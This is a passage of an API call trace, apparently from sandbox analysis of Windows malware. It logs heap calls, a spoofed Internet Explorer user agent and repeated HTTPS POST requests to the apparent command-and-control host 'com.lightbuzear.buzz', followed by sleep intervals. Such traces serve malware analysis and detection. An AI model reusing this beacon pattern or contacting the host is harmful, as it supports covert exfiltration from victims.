(HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48158f0 [0242.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815908 | out: hHeap=0x4780000) returned 1 [0242.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0242.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158f0 | out: hHeap=0x4780000) returned 1 [0242.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48308e0 [0242.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0242.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0242.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0242.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308e0 [0242.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0242.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830908 [0242.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0242.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0242.133] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0242.134] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0242.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830908 | out: hHeap=0x4780000) returned 1 [0242.134] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0242.135] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0242.135] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0242.135] FreeLibrary (hLibModule=0x71570000) returned 1 [0242.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0242.138] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0242.138] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0242.138] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0242.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0242.139] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0242.139] Sleep (dwMilliseconds=0x2710) [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0242.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0242.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0242.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0242.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815ad0 [0242.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ab8 [0242.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0242.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ab8 | out: hHeap=0x4780000) returned 1 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815a88 [0242.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0242.154] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0242.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0242.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0242.462] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0242.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0242.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0242.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0242.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0242.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0242.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0242.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0242.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0242.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815aa0 [0242.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815998 [0242.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815aa0 | out: hHeap=0x4780000) returned 1 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0242.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815998 | out: hHeap=0x4780000) returned 1 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830908 [0242.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0242.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830908 | out: hHeap=0x4780000) returned 1 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830908 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0242.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0242.464] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0242.466] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0242.466] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0242.466] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0242.466] FreeLibrary (hLibModule=0x71780000) returned 1 [0242.467] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0242.467] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0242.467] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0242.467] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0242.468] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0242.468] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0242.468] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0242.468] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0242.468] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0242.468] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0242.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0242.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0242.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0242.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0242.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0242.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815950 [0242.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0242.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0242.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815950 | out: hHeap=0x4780000) returned 1 [0242.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48158d8 [0242.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0242.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0242.469] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0242.469] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0242.469] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48158f0 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815860 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158f0 | out: hHeap=0x4780000) returned 1 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815860 | out: hHeap=0x4780000) returned 1 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815aa0 [0242.470] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0c8 [0242.470] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0c8 | out: hHeap=0x4780000) returned 1 [0242.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0242.471] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0242.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0242.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0242.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0242.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48158f0 [0242.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ad0 [0242.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158f0 | out: hHeap=0x4780000) returned 1 [0242.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0242.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0242.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a1e0 [0242.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0242.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0242.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0242.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0242.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0242.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0c8 [0242.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0242.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0242.473] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0242.473] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0242.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0c8 | out: hHeap=0x4780000) returned 1 [0242.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0242.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0242.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0242.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0242.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0242.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0242.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0242.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0242.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815848 [0242.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a58 [0242.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815848 | out: hHeap=0x4780000) returned 1 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0242.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a58 | out: hHeap=0x4780000) returned 1 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a0c8 [0242.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0242.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0c8 | out: hHeap=0x4780000) returned 1 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0c8 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0242.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0242.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0242.515] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0242.515] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0242.515] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0243.579] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0243.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0243.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0243.579] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0243.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0243.579] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815818 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815950 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815950 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830e58 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0243.580] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e58 | out: hHeap=0x4780000) returned 1 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e58 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0243.580] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0243.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0243.581] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0243.581] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0243.581] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0243.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0243.582] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0243.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0243.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0243.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0243.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0243.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0243.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0243.582] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0243.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0243.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815950 [0243.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815830 [0243.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815950 | out: hHeap=0x4780000) returned 1 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0243.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48154a0 [0243.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0243.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0243.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0243.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0243.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0243.584] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0243.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0243.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0243.584] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0243.585] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0243.585] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0243.585] FreeLibrary (hLibModule=0x71570000) returned 1 [0243.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0243.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0243.585] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0243.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0243.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0243.586] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 